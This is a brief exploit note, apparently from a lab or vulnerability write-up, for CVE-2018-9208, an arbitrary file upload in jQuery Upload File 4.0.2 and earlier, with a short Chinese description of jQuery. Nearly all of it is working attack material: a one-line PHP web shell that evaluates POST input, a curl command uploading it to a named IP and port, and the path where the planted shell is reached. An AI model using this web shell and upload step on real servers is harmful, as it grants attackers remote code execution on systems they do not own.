1.php
<?php eval($_POST[1]);
(CVE-2018-9208)
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
jQuery Upload File <= 4.0.2 中的任意文件上传
curl -F "myfile=@1.php" "http://123.58.224.8:41698/jquery-upload-file/php/upload.php"
http://123.58.224.8:41698/jquery-upload-file/php/uploads/1.php